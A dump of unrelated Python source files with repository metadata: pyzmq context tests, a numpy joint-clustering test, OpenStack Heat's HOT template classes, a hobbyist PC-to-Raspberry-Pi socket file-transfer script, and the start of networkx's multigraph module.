s = ctx.socket(zmq.PUB)
s.close()
del ctx2
self.assertFalse(ctx.closed)
s = ctx.socket(zmq.PUB)
ctx2 = self.Context.shadow(ctx.underlying)
s2 = ctx2.socket(zmq.PUB)
s.close()
s2.close()
ctx.term()
self.assertRaisesErrno(zmq.EFAULT, ctx2.socket, zmq.PUB)
del ctx2
def test_shadow_pyczmq(self):
try:
from pyczmq import zctx, zsocket, zstr
except Exception:
raise SkipTest("Requires pyczmq")
ctx = zctx.new()
a = zsocket.new(ctx, zmq.PUSH)
zsocket.bind(a, "inproc://a")
ctx2 = self.Context.shadow_pyczmq(ctx)
b = ctx2.socket(zmq.PULL)
b.connect("inproc://a")
zstr.send(a, b'hi')
rcvd = self.recv(b)
self.assertEqual(rcvd, b'hi')
b.close()
if False: # disable green context tests
class TestContextGreen(GreenTest, TestContext):
"""gevent subclass of context tests"""
# skip tests that use real threads:
test_gc = GreenTest.skip_green
test_term_thread = GreenTest.skip_green
test_destroy_linger = GreenTest.skip_green
| 31.012195
| 91
| 0.570783
|
fe33dd6cb214fd6fd419552d34bfe244e68037cb
| 2,409
|
py
|
Python
|
project/tests/test_pairwise_relations.py
|
qxcv/comp2560
|
930adfffe95313ad0e43ca782b1ad8140948ff33
|
[
"Apache-2.0"
] | 6
|
2016-02-29T12:55:56.000Z
|
2020-03-18T14:37:59.000Z
|
project/tests/test_pairwise_relations.py
|
qxcv/comp2560
|
930adfffe95313ad0e43ca782b1ad8140948ff33
|
[
"Apache-2.0"
] | 1
|
2017-06-06T19:34:21.000Z
|
2017-07-21T02:01:48.000Z
|
project/tests/test_pairwise_relations.py
|
qxcv/comp2560
|
930adfffe95313ad0e43ca782b1ad8140948ff33
|
[
"Apache-2.0"
] | 4
|
2016-08-11T00:41:42.000Z
|
2020-06-23T09:32:02.000Z
|
import numpy as np
from datasets import Joints
from pairwise_relations import from_dataset
def generate_fake_locations(num, means, stddev=5):
"""Generate a matrix with four rows (one for each "point") and three
columns (x-coord, y-coord and visibility). Means is a 3x2 matrix giving
mean locations for each point."""
per_joint = []
for joint_mean in means:
locations = np.random.multivariate_normal(
joint_mean, stddev * np.eye(2), num
)
with_visibility = np.append(locations, np.ones((num, 1)), axis=1)
per_joint.append(with_visibility)
warped_array = np.array(per_joint)
# Now we need to swap the first and second dimensions
return warped_array.transpose((1, 0, 2))
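# Shape note added for clarity (not part of the original test): with num=100 samples
# and 4 joint means, generate_fake_locations returns an array of shape (100, 4, 3),
# i.e. (sample, joint, [x, y, visibility]).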
def test_clustering():
"""Test learning of clusters for joint types."""
first_means = np.asarray([
(10, 70),
(58, 94),
(66, 58),
(95, 62)
])
second_means = np.asarray([
(88, 12),
(56, 15),
(25, 21),
(24, 89)
])
fake_locations = np.concatenate([
generate_fake_locations(100, first_means),
generate_fake_locations(100, second_means),
], axis=0)
np.random.shuffle(fake_locations)
fake_pairs = [
(0, 1),
(1, 2),
(2, 3)
]
fake_joints = Joints(fake_locations, fake_pairs)
# Make two clusters for each relationship type. Yes, passing in zeros as
# your scale is stupid, and poor testing practice.
centers = from_dataset(fake_joints, 2, np.zeros(len(fake_locations)), 1)
assert centers.ndim == 3
# Three joints, two clusters per joint, two coordinates (i.e. x, y) per
# cluster
assert centers.shape == (3, 2, 2)
for idx, pair in enumerate(fake_pairs):
first_idx, second_idx = pair
first_mean = first_means[second_idx] - first_means[first_idx]
second_mean = second_means[second_idx] - second_means[first_idx]
found_means = centers[idx]
first_dists = np.linalg.norm(found_means - first_mean, axis=1)
second_dists = np.linalg.norm(found_means - second_mean, axis=1)
# Make sure that each of our specified means are within Euclidean
# distance 1 of at least one found cluster
first_within = first_dists < 1
assert first_within.any()
second_within = second_dists < 1
assert second_within.any()
| 33.929577
| 76
| 0.64093
|
b6e3d9dc58ff1d4dcfaf20418b522b7d3778c95f
| 18,694
|
py
|
Python
|
heat/engine/hot/template.py
|
p0i0/openstack-heat
|
414d5b11c0f454d1aac6c26eeff8f89e731dc0f3
|
[
"Apache-2.0"
] | null | null | null |
heat/engine/hot/template.py
|
p0i0/openstack-heat
|
414d5b11c0f454d1aac6c26eeff8f89e731dc0f3
|
[
"Apache-2.0"
] | null | null | null |
heat/engine/hot/template.py
|
p0i0/openstack-heat
|
414d5b11c0f454d1aac6c26eeff8f89e731dc0f3
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine.cfn import functions as cfn_funcs
from heat.engine.cfn import template as cfn_template
from heat.engine import function
from heat.engine.hot import functions as hot_funcs
from heat.engine.hot import parameters
from heat.engine import rsrc_defn
from heat.engine import template_common
class HOTemplate20130523(template_common.CommonTemplate):
"""A Heat Orchestration Template format stack template."""
SECTIONS = (
VERSION, DESCRIPTION, PARAMETER_GROUPS,
PARAMETERS, RESOURCES, OUTPUTS, MAPPINGS,
) = (
'heat_template_version', 'description', 'parameter_groups',
'parameters', 'resources', 'outputs', '__undefined__',
)
OUTPUT_KEYS = (
OUTPUT_DESCRIPTION, OUTPUT_VALUE,
) = (
'description', 'value',
)
SECTIONS_NO_DIRECT_ACCESS = set([PARAMETERS, VERSION])
_CFN_TO_HOT_SECTIONS = {cfn_template.CfnTemplate.VERSION: VERSION,
cfn_template.CfnTemplate.DESCRIPTION: DESCRIPTION,
cfn_template.CfnTemplate.PARAMETERS: PARAMETERS,
cfn_template.CfnTemplate.MAPPINGS: MAPPINGS,
cfn_template.CfnTemplate.RESOURCES: RESOURCES,
cfn_template.CfnTemplate.OUTPUTS: OUTPUTS}
_RESOURCE_KEYS = (
RES_TYPE, RES_PROPERTIES, RES_METADATA, RES_DEPENDS_ON,
RES_DELETION_POLICY, RES_UPDATE_POLICY, RES_DESCRIPTION,
) = (
'type', 'properties', 'metadata', 'depends_on',
'deletion_policy', 'update_policy', 'description',
)
_RESOURCE_HOT_TO_CFN_ATTRS = {
RES_TYPE: cfn_template.CfnTemplate.RES_TYPE,
RES_PROPERTIES: cfn_template.CfnTemplate.RES_PROPERTIES,
RES_METADATA: cfn_template.CfnTemplate.RES_METADATA,
RES_DEPENDS_ON: cfn_template.CfnTemplate.RES_DEPENDS_ON,
RES_DELETION_POLICY: cfn_template.CfnTemplate.RES_DELETION_POLICY,
RES_UPDATE_POLICY: cfn_template.CfnTemplate.RES_UPDATE_POLICY,
RES_DESCRIPTION: cfn_template.CfnTemplate.RES_DESCRIPTION}
_HOT_TO_CFN_ATTRS = _RESOURCE_HOT_TO_CFN_ATTRS
_HOT_TO_CFN_ATTRS.update(
{OUTPUT_VALUE: cfn_template.CfnTemplate.OUTPUT_VALUE})
extra_rsrc_defn = ()
functions = {
'Fn::GetAZs': cfn_funcs.GetAZs,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'Ref': cfn_funcs.Ref,
'get_attr': hot_funcs.GetAttThenSelect,
'Fn::Select': cfn_funcs.Select,
'Fn::Join': cfn_funcs.Join,
'list_join': hot_funcs.Join,
'Fn::Split': cfn_funcs.Split,
'str_replace': hot_funcs.Replace,
'Fn::Replace': cfn_funcs.Replace,
'Fn::Base64': cfn_funcs.Base64,
'Fn::MemberListToMap': cfn_funcs.MemberListToMap,
'resource_facade': hot_funcs.ResourceFacade,
'Fn::ResourceFacade': cfn_funcs.ResourceFacade,
'get_file': hot_funcs.GetFile,
}
deletion_policies = {
'Delete': rsrc_defn.ResourceDefinition.DELETE,
'Retain': rsrc_defn.ResourceDefinition.RETAIN,
'Snapshot': rsrc_defn.ResourceDefinition.SNAPSHOT
}
def __getitem__(self, section):
""""Get the relevant section in the template."""
# first translate from CFN into HOT terminology if necessary
if section not in self.SECTIONS:
section = HOTemplate20130523._translate(
section, self._CFN_TO_HOT_SECTIONS,
_('"%s" is not a valid template section'))
if section not in self.SECTIONS:
raise KeyError(_('"%s" is not a valid template section') % section)
if section in self.SECTIONS_NO_DIRECT_ACCESS:
raise KeyError(
_('Section %s can not be accessed directly.') % section)
if section == self.MAPPINGS:
return {}
if section == self.DESCRIPTION:
default = 'No description'
else:
default = {}
# if a section is None (empty yaml section) return {}
# to be consistent with an empty json section.
the_section = self.t.get(section) or default
# In some cases (e.g. parameters), also translate each entry of
# a section into CFN format (case, naming, etc) so the rest of the
# engine can cope with it.
# This is a shortcut for now and might be changed in the future.
if section == self.RESOURCES:
return self._translate_resources(the_section)
if section == self.OUTPUTS:
self.validate_section(self.OUTPUTS, self.OUTPUT_VALUE,
the_section, self.OUTPUT_KEYS)
return the_section
@staticmethod
def _translate(value, mapping, err_msg=None):
try:
return mapping[value]
except KeyError as ke:
if err_msg:
raise KeyError(err_msg % value)
else:
raise ke
def validate_section(self, section, sub_section, data, allowed_keys):
obj_name = section[:-1]
err_msg = _('"%%s" is not a valid keyword inside a %s '
'definition') % obj_name
args = {'object_name': obj_name, 'sub_section': sub_section}
message = _('Each %(object_name)s must contain a '
'%(sub_section)s key.') % args
for name, attrs in sorted(data.items()):
if not attrs:
raise exception.StackValidationFailed(message=message)
try:
for attr, attr_value in six.iteritems(attrs):
if attr not in allowed_keys:
raise KeyError(err_msg % attr)
if sub_section not in attrs:
raise exception.StackValidationFailed(message=message)
except AttributeError:
message = _('"%(section)s" must contain a map of '
'%(obj_name)s maps. Found a [%(_type)s] '
'instead') % {'section': section,
'_type': type(attrs),
'obj_name': obj_name}
raise exception.StackValidationFailed(message=message)
except KeyError as e:
# an invalid keyword was found
raise exception.StackValidationFailed(message=e.args[0])
def _translate_section(self, section, sub_section, data, mapping):
self.validate_section(section, sub_section, data, mapping)
cfn_objects = {}
for name, attrs in sorted(data.items()):
cfn_object = {}
for attr, attr_value in six.iteritems(attrs):
cfn_attr = mapping[attr]
if cfn_attr is not None:
cfn_object[cfn_attr] = attr_value
cfn_objects[name] = cfn_object
return cfn_objects
def _translate_resources(self, resources):
"""Get the resources of the template translated into CFN format."""
return self._translate_section(self.RESOURCES, self.RES_TYPE,
resources,
self._RESOURCE_HOT_TO_CFN_ATTRS)
def get_section_name(self, section):
cfn_to_hot_attrs = dict(
zip(six.itervalues(self._HOT_TO_CFN_ATTRS),
six.iterkeys(self._HOT_TO_CFN_ATTRS)))
return cfn_to_hot_attrs.get(section, section)
def param_schemata(self, param_defaults=None):
parameter_section = self.t.get(self.PARAMETERS) or {}
pdefaults = param_defaults or {}
for name, schema in six.iteritems(parameter_section):
if name in pdefaults:
parameter_section[name]['default'] = pdefaults[name]
params = six.iteritems(parameter_section)
return dict((name, parameters.HOTParamSchema.from_dict(name, schema))
for name, schema in params)
def parameters(self, stack_identifier, user_params, param_defaults=None):
return parameters.HOTParameters(stack_identifier, self,
user_params=user_params,
param_defaults=param_defaults)
def resource_definitions(self, stack):
resources = self.t.get(self.RESOURCES) or {}
def rsrc_defn_from_snippet(name, snippet):
data = self.parse(stack, snippet)
return self.rsrc_defn_from_snippet(name, data)
return dict(
(name, rsrc_defn_from_snippet(name, data))
for name, data in resources.items() if self.get_res_condition(
stack, data, name))
@classmethod
def rsrc_defn_from_snippet(cls, name, data):
depends = data.get(cls.RES_DEPENDS_ON)
if isinstance(depends, six.string_types):
depends = [depends]
deletion_policy = function.resolve(
data.get(cls.RES_DELETION_POLICY))
if deletion_policy is not None:
if deletion_policy not in cls.deletion_policies:
msg = _('Invalid deletion policy "%s"') % deletion_policy
raise exception.StackValidationFailed(message=msg)
else:
deletion_policy = cls.deletion_policies[deletion_policy]
kwargs = {
'resource_type': data.get(cls.RES_TYPE),
'properties': data.get(cls.RES_PROPERTIES),
'metadata': data.get(cls.RES_METADATA),
'depends': depends,
'deletion_policy': deletion_policy,
'update_policy': data.get(cls.RES_UPDATE_POLICY),
'description': None
}
for key in cls.extra_rsrc_defn:
kwargs[key] = data.get(key)
return rsrc_defn.ResourceDefinition(name, **kwargs)
def add_resource(self, definition, name=None):
if name is None:
name = definition.name
if self.t.get(self.RESOURCES) is None:
self.t[self.RESOURCES] = {}
self.t[self.RESOURCES][name] = definition.render_hot()
class HOTemplate20141016(HOTemplate20130523):
functions = {
'get_attr': hot_funcs.GetAtt,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.Join,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.Replace,
'Fn::Select': cfn_funcs.Select,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20150430(HOTemplate20141016):
functions = {
'get_attr': hot_funcs.GetAtt,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.Join,
'repeat': hot_funcs.Repeat,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.Replace,
'Fn::Select': cfn_funcs.Select,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20151015(HOTemplate20150430):
functions = {
'get_attr': hot_funcs.GetAttAllAttributes,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.JoinMultiple,
'repeat': hot_funcs.Repeat,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.ReplaceJson,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions added in 2015-10-15
'str_split': hot_funcs.StrSplit,
# functions removed from 2015-10-15
'Fn::Select': hot_funcs.Removed,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20160408(HOTemplate20151015):
functions = {
'get_attr': hot_funcs.GetAttAllAttributes,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.JoinMultiple,
'repeat': hot_funcs.Repeat,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.ReplaceJson,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions added in 2015-10-15
'str_split': hot_funcs.StrSplit,
# functions added in 2016-04-08
'map_merge': hot_funcs.MapMerge,
# functions removed from 2015-10-15
'Fn::Select': hot_funcs.Removed,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
class HOTemplate20161014(HOTemplate20160408):
CONDITION = 'condition'
RES_CONDITION = CONDITION
CONDITIONS = 'conditions'
SECTIONS = HOTemplate20160408.SECTIONS + (CONDITIONS,)
_CFN_TO_HOT_SECTIONS = HOTemplate20160408._CFN_TO_HOT_SECTIONS
_CFN_TO_HOT_SECTIONS.update({
cfn_template.CfnTemplate.CONDITIONS: CONDITIONS})
_RESOURCE_KEYS = HOTemplate20160408._RESOURCE_KEYS
_EXT_KEY = (RES_EXTERNAL_ID,) = ('external_id',)
_RESOURCE_KEYS += _EXT_KEY
_RESOURCE_KEYS += (RES_CONDITION,)
_RESOURCE_HOT_TO_CFN_ATTRS = HOTemplate20160408._RESOURCE_HOT_TO_CFN_ATTRS
_RESOURCE_HOT_TO_CFN_ATTRS.update({RES_EXTERNAL_ID: None})
_RESOURCE_HOT_TO_CFN_ATTRS.update(
{CONDITION: cfn_template.CfnTemplate.CONDITION})
extra_rsrc_defn = HOTemplate20160408.extra_rsrc_defn + (
RES_EXTERNAL_ID, RES_CONDITION,)
OUTPUT_CONDITION = CONDITION
OUTPUT_KEYS = HOTemplate20160408.OUTPUT_KEYS + (OUTPUT_CONDITION,)
deletion_policies = {
'Delete': rsrc_defn.ResourceDefinition.DELETE,
'Retain': rsrc_defn.ResourceDefinition.RETAIN,
'Snapshot': rsrc_defn.ResourceDefinition.SNAPSHOT,
# aliases added in 2016-10-14
'delete': rsrc_defn.ResourceDefinition.DELETE,
'retain': rsrc_defn.ResourceDefinition.RETAIN,
'snapshot': rsrc_defn.ResourceDefinition.SNAPSHOT,
}
functions = {
'get_attr': hot_funcs.GetAttAllAttributes,
'get_file': hot_funcs.GetFile,
'get_param': hot_funcs.GetParam,
'get_resource': cfn_funcs.ResourceRef,
'list_join': hot_funcs.JoinMultiple,
'repeat': hot_funcs.RepeatWithMap,
'resource_facade': hot_funcs.ResourceFacade,
'str_replace': hot_funcs.ReplaceJson,
# functions added in 2015-04-30
'digest': hot_funcs.Digest,
# functions added in 2015-10-15
'str_split': hot_funcs.StrSplit,
# functions added in 2016-04-08
'map_merge': hot_funcs.MapMerge,
# functions added in 2016-10-14
'yaql': hot_funcs.Yaql,
'map_replace': hot_funcs.MapReplace,
'if': hot_funcs.If,
# functions removed from 2015-10-15
'Fn::Select': hot_funcs.Removed,
# functions removed from 2014-10-16
'Fn::GetAZs': hot_funcs.Removed,
'Fn::Join': hot_funcs.Removed,
'Fn::Split': hot_funcs.Removed,
'Fn::Replace': hot_funcs.Removed,
'Fn::Base64': hot_funcs.Removed,
'Fn::MemberListToMap': hot_funcs.Removed,
'Fn::ResourceFacade': hot_funcs.Removed,
'Ref': hot_funcs.Removed,
}
condition_functions = {
'get_param': hot_funcs.GetParam,
'equals': hot_funcs.Equals,
}
def __init__(self, tmpl, template_id=None, files=None, env=None):
super(HOTemplate20161014, self).__init__(
tmpl, template_id, files, env)
self._parser_condition_functions = {}
for n, f in six.iteritems(self.functions):
if not isinstance(f, hot_funcs.Removed):
self._parser_condition_functions[n] = function.Invalid
else:
self._parser_condition_functions[n] = f
self._parser_condition_functions.update(self.condition_functions)
self.merge_sections = [self.PARAMETERS, self.CONDITIONS]
def get_condition_definitions(self):
return self[self.CONDITIONS]
def validate_resource_definition(self, name, data):
super(HOTemplate20161014, self).validate_resource_definition(
name, data)
self.validate_resource_key_type(
self.RES_EXTERNAL_ID,
(six.string_types, function.Function),
'string', self._RESOURCE_KEYS, name, data)
self.validate_resource_key_type(
self.RES_CONDITION,
(six.string_types, bool),
'string or boolean', self._RESOURCE_KEYS, name, data)
def has_condition_section(self, snippet):
if snippet and self.CONDITION in snippet:
return True
return False
| 37.09127
| 79
| 0.632074
|
e1f9a90857398f9a0fdeaca2d04fa69ad9807a40
| 9,273
|
py
|
Python
|
sccoresystems/sccspython/sccsLNLPcToPi.py
|
ninekorn/sccsVRStreamingHeadsetScriptsNProjectParts-WIP
|
76bf728e961133ce16ad89bef7fcfe030d163847
|
[
"MIT"
] | null | null | null |
sccoresystems/sccspython/sccsLNLPcToPi.py
|
ninekorn/sccsVRStreamingHeadsetScriptsNProjectParts-WIP
|
76bf728e961133ce16ad89bef7fcfe030d163847
|
[
"MIT"
] | null | null | null |
sccoresystems/sccspython/sccsLNLPcToPi.py
|
ninekorn/sccsVRStreamingHeadsetScriptsNProjectParts-WIP
|
76bf728e961133ce16ad89bef7fcfe030d163847
|
[
"MIT"
] | null | null | null |
#made by ninekorn
import socket
import os
import time
import sys
import struct
#https://stackoverflow.com/questions/1271320/resetting-generator-object-in-python
#import more_itertools as mit
#import tqdm
# device's IP address
PC_HOST = "192.168.0.107"
PC_PORT = 5001
# device's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5000
# receive 4096 bytes each time
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
clientfilename = "sccsmsgPiToPc.txt"
# get the file size
clientfilesize = os.path.getsize(clientfilename)
# create the server socket
# TCP socket
#s = socket.socket()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print("Listening " + str(SERVER_HOST) + " " + str(SERVER_PORT)) #f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}"
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(str(address) + " is connected" ) #f"[+] {address} is connected."
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
#filename = received
#filesize = 0
#filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
filename = os.path.basename(received)
# convert to integer
filesize = 0#int(filesize)
somecounter = 0
somecountermax = 1
# start receiving the file from the socket
# and writing to the file stream
#f"Receiving {filename}"
#progress = tqdm.tqdm(range(filesize), "Receiving " + str(filename), unit="B", unit_scale=True, unit_divisor=1024,mininterval=0,miniters=1,smoothing=1)
someswtc = 0
somefinalcounter = 0
f = open(r'\\.\pipe\sccsmscpcTopi', 'r+b', 0)
i = 1
screenrowwidth = 8294400
somestring = ""
for x in range(screenrowwidth):
somestring = somestring + ' '
someitergenresetcounter = 0
someitergenresetcountermax = 0
def generator(n):
i = 0
while i > n:
yield i
#i += 1
#y = mit.seekable(generator())
y = generator(-1)
if __name__ == "__main__":
for x in y:
#section to read the buffer
s = somestring.encode('ascii') #'Message[{0}]'.format(i).encode('ascii')
i += 1
f.write(struct.pack('I', len(s)) + s) # Write str length and str
f.seek(0) # EDIT: This is also necessary
print('Wrote:', s)
n = struct.unpack('I', f.read(4))[0] # Read str length
s = f.read(n).decode('ascii') # Read str
f.seek(0) # Important!!!
print('Read:', s)
#section to read the buffer
if someswtc == -1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print("Listening " + str(SERVER_HOST) + " " + str(SERVER_PORT)) #f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}"
try:
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(str(address) + " is connected" ) #f"[+ {address} is connected."
somesocketreceiverswtc = 1
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
#filename, filesize = received.split(SEPARATOR)
filename = received
filesize = 0
#filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
#filename = os.path.basename(filename)
# convert to integer
#filesize = int(filesize)
somecounter = 0
            somecountermax = 1
# start receiving the file from the socket
# and writing to the file stream
#f"Receiving {filename}"
#progress = tqdm.tqdm(range(filesize), "Receiving " + str(filename), unit="B", unit_scale=True, unit_divisor=1024,mininterval=0,miniters=1,smoothing=1)
someswtc = 0
except Exception as ex:
print(ex)
if someswtc == 0:
somefilesizeswtc = 0
try:
filename,junk = filename.split(">>>>")
somefilesizeswtc = 1
except:
# convert to integer
#filesize = int(filesize)
somefilesizeswtc = 0
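            # If the announced filename contains the ad-hoc ">>>>" separator, the text
            # after it is written straight into the named file as an inline message;
            # otherwise the file body is streamed over the client socket below.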
if somefilesizeswtc == 1:
#with open(filename, "wb") as f:
textfile = open(filename, "w")
textfile.write("#" + junk)
textfile.close()
# close the client socket
client_socket.close()
# close the server socket
s.close()
else:
with open(filename, "wb") as f:
while True:
# read 1024 bytes from the socket (receive)
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
# nothing is received
# file transmitting is done
break
# write to the file the bytes we just received
f.write(bytes_read)
# update the progress bar
#progress.update(len(bytes_read))
# close the client socket
client_socket.close()
# close the server socket
s.close()
someswtc = 1
if someswtc == 1:
print("creating socket")
# create the server socket
# TCP socket
#s = socket.socket()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#s.setblocking(1)
someswtc = 2
if someswtc == 2:
print("ready to receive another file. advising server.")
# bind the socket to our local address
#s.bind((PC_HOST, PC_PORT))
try:
print("[+] Connecting.")
s.connect((PC_HOST, PC_PORT))
print("[+] Connected.")
someswtc = 3
except Exception as ex:
print(ex)
#s.send(("PiToPc-received-" + str(filename)).encode())
#someswtc = 0
if someswtc == 3:
#print("wait for the programmer ninekorn to insert code here.")
print("sending confirmation receipt file to server with request for another file or not.")
#s.send(("PiToPc-received-" + str(filename)).encode())
#s.setblocking(1)
#s.send(f"{clientfilename}{SEPARATOR}{clientfilesize}".encode())
s.send("PiToPcReceipt".encode())
#s.close()
#s = socket.socket()
#s.bind()
#s.listen(5)
# start sending the file
#progress = tqdm.tqdm(range(clientfilesize), clientfilename, unit="B", unit_scale=True, unit_divisor=1024,mininterval=0,miniters=1,smoothing=1)
with open(clientfilename, "rb") as f:
while True:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to assure transimission in
# busy networks
s.sendall(bytes_read)
# update the progress bar
#progress.update(len(bytes_read))
# close the socket
s.close()
someswtc = -1
if someitergenresetcounter >= someitergenresetcountermax:
#y.seek(0)
#print(x)
someitergenresetcounter = 0
someitergenresetcounter += 1
time.sleep(0)
| 33.597826
| 167
| 0.527877
|
3a6b7de39e35d1dda0abf34f3b31a837cfa98021
| 2,698
|
py
|
Python
|
tests/utils.py
|
mawillcockson/mw_url_shortener
|
312cc958dceaeaeecc5bfcf1a958b8cb092a3568
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
mawillcockson/mw_url_shortener
|
312cc958dceaeaeecc5bfcf1a958b8cb092a3568
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
mawillcockson/mw_url_shortener
|
312cc958dceaeaeecc5bfcf1a958b8cb092a3568
|
[
"MIT"
] | null | null | null |
"""
utilities used by the tests
generally, these are utilities that can't work as pytest fixtures, since pytest fixtures provide the same value all throughout a single test function, regardless of scope
"""
import itertools
from random import randint
from typing import Iterable
import faker # faker fixture required for tests
from mw_url_shortener.database import redirect, user
from mw_url_shortener.types import HashedPassword, Key, Uri, Username
from mw_url_shortener.utils import random_username as rand_username
from mw_url_shortener.utils import (
unsafe_random_hashed_password as random_hashed_password,
)
from mw_url_shortener.utils import unsafe_random_string as random_string
def random_username() -> Username:
"creates an example username"
return rand_username(randint(1, 10))
def random_user() -> user.Model:
"creates a fictitious user that doesn't exist in the database"
return user.Model(
username=random_username(),
hashed_password=random_hashed_password(),
)
fake = faker.Faker()
fake.add_provider(faker.providers.misc)
fake.add_provider(faker.providers.internet)
def random_json() -> str:
"uses faker fixture to generate random json"
return str(fake.json())
def random_uri() -> Uri:
"uses faker to generate random URIs"
return Uri(fake.uri())
def random_key() -> Key:
"""
uses faker to generate unique random keys
from:
https://faker.readthedocs.io/en/stable/providers/faker.providers.misc.html#faker.providers.misc.Provider.password
"""
# NOTE:BUG Doesn't go below 3 characters in length
# Need to make a new_redirect_key function
return Key(
fake.unique.password(
length=randint(3, 10),
special_chars=False,
digits=True,
upper_case=True,
lower_case=True,
)
)
def random_redirect() -> redirect.Model:
"uses faker to generate a random redirect model"
return redirect.Model(key=random_key(), uri=random_uri())
def all_combinations(characters: str, length: int) -> Iterable[str]:
"""
gives an iterator that produces all the combinations of characters from a
set for a particular length
"""
if not (isinstance(characters, str) and len(characters) > 0):
raise TypeError("characters must be a str of 1 or more characters")
if not (isinstance(length, int) and length > 0):
raise TypeError("length must be a positive int greater than 0")
def combo_gen() -> Iterable[str]:
"inner generator"
        for char_tuple in itertools.product(set(characters), repeat=length):
            yield "".join(char_tuple)
return combo_gen()
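# For example, sorted(all_combinations("ab", 2)) == ["aa", "ab", "ba", "bb"];
# sorting is needed because iteration order over the internal set of characters
# is not guaranteed.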
| 29.977778
| 168
| 0.710897
|
1779a6167b06b4503d67c586f397788737f8f699
| 40,241
|
py
|
Python
|
networkx/classes/multigraph.py
|
MaxBromberg/networkx
|
e4d1483f241e9a56fbda247592710b659d29bce5
|
[
"BSD-3-Clause"
] | 1
|
2020-11-20T10:14:14.000Z
|
2020-11-20T10:14:14.000Z
|
networkx/classes/multigraph.py
|
MaxBromberg/networkx
|
e4d1483f241e9a56fbda247592710b659d29bce5
|
[
"BSD-3-Clause"
] | 4
|
2016-04-22T14:50:02.000Z
|
2020-11-20T09:30:44.000Z
|
networkx/classes/multigraph.py
|
MaxBromberg/networkx
|
e4d1483f241e9a56fbda247592710b659d29bce5
|
[
"BSD-3-Clause"
] | 2
|
2020-12-21T11:41:13.000Z
|
2021-01-08T17:09:21.000Z
|
"""Base class for MultiGraph."""
from copy import deepcopy
import networkx as nx
from networkx.classes.graph import Graph
